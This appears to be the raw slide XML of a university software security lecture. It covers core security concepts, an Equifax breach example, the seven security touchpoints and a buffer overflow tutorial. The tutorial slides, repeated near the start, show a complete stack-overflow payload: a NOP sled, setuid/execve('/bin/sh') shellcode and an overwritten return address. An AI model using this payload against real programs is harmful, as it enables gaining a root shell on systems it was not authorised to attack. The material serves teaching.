              <a:t>\x80\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>xeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>\x80\xe8\xe5\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\x2f\x62\x69\x6e\x2f\x73\x68’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="600" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="x-none" sz="2400" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>’+’\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>x20\xd0\xff\xff’)”)</a:t>
            </a:r>
            <a:endParaRPr lang="x-none" sz="2400" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="x-none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Craft the Attack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57405" y="3818644"/>
            <a:ext cx="5463995" cy="5642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286" y="4779518"/>
            <a:ext cx="8882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400" dirty="0" smtClean="0"/>
              <a:t>This is the starting address of thebuffer (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>0x7ffffd020</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="2400" dirty="0" smtClean="0"/>
              <a:t>) but in reverse because that is modern computers use the little endian notation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="x-none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7457" y="1505396"/>
            <a:ext cx="86333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"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>un $(python </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>c “print(‘\x90’*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>214+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sz="600" dirty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‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>\x31\xc0\xb0\x46\x31\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>xdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>\x31\xc9\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>\x80\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>xeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>\x80\xe8\xe5\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xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>\x2f\x62\x69\x6e\x2f\x73\x68’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="600" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="x-none" sz="2400" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>’+’\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>x20\xd0\xff\xff’)”)</a:t>
            </a:r>
            <a:endParaRPr lang="x-none" sz="2400" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pP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57792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Vulnerability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43841"/>
            <a:ext cx="822960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type of vulnerabilities exist. They are listed in:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>OWASP Top 10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Vulnerabilities </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.owasp.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/images/7/72/OWASP_Top_10-2017_%28en%29.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>pdf.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>CVE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> Common Vulnerabilities and Exposures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1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Vulnerabilities arise from defects, which in turn fall into two broad categories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/>
              <a:t>Implementation bugs (50%)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>e.g., SQL Injection, buffer overflow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/>
              <a:t>Design level flaws (50%):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Weak/missing access control mechanisms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Lack of auditing/logging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534" y="5216294"/>
            <a:ext cx="6688689" cy="12443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Design Flaws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43841"/>
            <a:ext cx="8229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Although a flaw is intantiated in software code, it is also present at design level.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="x-none" sz="2800" dirty="0" smtClean="0"/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Identification of desing flaws is hard to automate!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="x-none" sz="2800" dirty="0"/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Examples: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400" dirty="0" smtClean="0"/>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="2400" dirty="0" smtClean="0"/>
              <a:t>nprotected data channels</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="x-none" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Incorrect or missing access control mechanisms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="x-none" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Weak password recovery mechanisms (Microsoft Bob Program for Windows 98, etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="x-none" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Ordering and timing errors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="x-none" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="x-none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3754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Security Concepts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83413"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="557465" y="1266603"/>
          <a:ext cx="8047970" cy="5333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1214"/>
                <a:gridCol w="5136756"/>
              </a:tblGrid>
              <a:tr h="57085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Asset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Something of value which has to be protected. Assets may be the software system itself or data processed</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> by that system.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Vulnerability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defect or</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> a weakness in system security procedures, design, implementation that can be exercised and result in a security breach or violation of a security policy.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Attack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exploitation of a software system’s vulnerability.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Countermeasure or Safeguard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Management, operational and technical controls prescribed to protect software system.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Threat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actor or agent who is the source of danger. In other words , the danger posed by a</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> malicious agent </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t> (e.g., fraudster, attacker,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> malicious hacker</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>) for a variety of motivations (e.g., financial gain, prestige).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6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Risk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43841"/>
            <a:ext cx="82296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800" dirty="0" smtClean="0"/>
              <a:t>Flaws and bugs lead to Risk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="x-none" sz="2800" dirty="0"/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Risk are not failures but capture the probability that a flaw or a bug will harm a software system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="x-none" sz="2800" dirty="0"/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Risk = (likelihood x impact)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="x-none" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="x-none" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Implementation and design are both equally important to ensure software security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="x-none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499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3"/>
            <a:ext cx="9144000" cy="4341830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Best Practices </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>(7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Touchpoints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9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7 Best Practices (Touchpoints)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57445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x-none" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Security best practices designed in such a way that security can be interleaved into existing development processes.</a:t>
            </a:r>
            <a:endParaRPr lang="x-none" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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43444" y="5943697"/>
            <a:ext cx="17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87797" y="5930173"/>
            <a:ext cx="82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73995" y="595583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63077" y="6182027"/>
            <a:ext cx="5902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ouchpoint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8" y="2897330"/>
            <a:ext cx="7795484" cy="3867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46903" y="6182027"/>
            <a:ext cx="355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Software engineering activities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Left Bracket 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4128581" y="1812953"/>
            <a:ext cx="622570" cy="75312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>
            <a:off x="4439867" y="5889847"/>
            <a:ext cx="0" cy="2921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5400000">
            <a:off x="4128581" y="-566438"/>
            <a:ext cx="622570" cy="75312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25114" y="2605150"/>
            <a:ext cx="0" cy="2921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1656" y="2280711"/>
            <a:ext cx="355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Security best practices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443841"/>
            <a:ext cx="8557130" cy="50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 smtClean="0"/>
              <a:t>Some touchpoints are more powerful than others</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="x-none" sz="2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Code Review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Architectural Risk Analysis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Penetration testing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Risk-based security tests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Abuse cases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Security requirements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x-none" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Security operations</a:t>
            </a:r>
            <a:endParaRPr lang="x-none" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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7 Best Practices (Touchpoints)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40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Security Concepts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> Equifax Example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31762"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="557465" y="1266603"/>
          <a:ext cx="8047970" cy="47847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9324"/>
                <a:gridCol w="5378646"/>
              </a:tblGrid>
              <a:tr h="57085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Asset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Personal info (names, social security numbers, etc. );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Online system to apply for a loan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Vulnerability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Bug</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> in the web application framework (Apache Struts)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Other defects could be present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Attack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malicious agents used the vulnerability in Apache struts to run code when uploading documents in the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Countermeasure or Safeguard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Robust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Authentication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Patching</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Apache Struts framework regularly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Threat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Malicious</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> agents who want to sell personal info or undermine Equifax reputation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Disgruntled Equifax employee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8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Vulnerability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43841"/>
            <a:ext cx="822960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type of vulnerabilities exist. They are listed in:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>OWASP Top 10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Vulnerabilities </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.owasp.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/images/7/72/OWASP_Top_10-2017_%28en%29.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>pdf.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>CVE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> Common Vulnerabilities and Exposures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1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Vulnerabilities arise from defects, which in turn fall into two broad categories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/>
              <a:t>Implementation bugs (50%)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>e.g., SQL Injection, buffer overflow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/>
              <a:t>Design level flaws (50%):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Weak/missing access control mechanisms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Lack of auditing/logging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535" y="4444049"/>
            <a:ext cx="5689600" cy="7958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 Implementation Bug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> Buffer overflow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43841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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="2800" dirty="0" smtClean="0"/>
              <a:t>t occurs when a software application is implemented in languages such as C or C++ that do not check whether reading/writing operations occur outside the bounds of data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="2800" dirty="0" smtClean="0"/>
              <a:t>objects.</a:t>
            </a:r>
            <a:endParaRPr lang="x-none" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="x-none" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="x-none" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Type-safe languages like Java and C# do not suffer from this issue since the definition of what </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="2800" dirty="0" smtClean="0"/>
              <a:t>consistutes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="2800" dirty="0" smtClean="0"/>
              <a:t>a data object is much more tightly controlled.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0303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Buffer Overflow Tutorial </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1" descr="Screen Shot 2019-01-25 at 09.1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1" y="2327814"/>
            <a:ext cx="4429017" cy="2992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225547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 smtClean="0"/>
              <a:t>Let’s have a look at this simple piece of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="2800" dirty="0" smtClean="0"/>
              <a:t>code (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="2800" i="1" dirty="0" smtClean="0"/>
              <a:t>boverflow.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="2800" dirty="0" smtClean="0"/>
              <a:t>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55175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Buffer Overflow Tutorial </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1" descr="Screen Shot 2019-01-25 at 09.1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1" y="2327814"/>
            <a:ext cx="4429017" cy="29921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0535" y="3775439"/>
            <a:ext cx="3101460" cy="2975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23020" y="3737951"/>
            <a:ext cx="403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check that ensures that a string up to a maximum length is copied in the buffer.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225547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 smtClean="0"/>
              <a:t>Let’s have a look at this simple piece of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="2800" dirty="0" smtClean="0"/>
              <a:t>code (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="2800" i="1" dirty="0" smtClean="0"/>
              <a:t>boverflow.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="2800" dirty="0" smtClean="0"/>
              <a:t>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81726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b="1" dirty="0" smtClean="0"/>
              <a:t>Buffer Overflow Tutorial </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2019-01-27 at 20.5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682750"/>
            <a:ext cx="4502150" cy="5175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2301" y="1477351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objective of this attack is to exceed the size of the buffer to overwrite the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Return Address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>in the stack with the address of the malicious code you want to execute.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156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1643</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>209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Lecture 2  Security Concepts &amp; Best Practices  (7 Touchpoints)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Security Best Practices  (7 Touchpoints)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 COMP47660</dc:title>
  <dc:creator>Liliana Pasquale</dc:creator>
  <cp:lastModifiedBy>Liliana Pasquale</cp:lastModifiedBy>
  <cp:revision>50</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-01-24T13:29:53Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-01-27T22:33:11Z</dcterms:modified>
</cp:coreProperties>
</file>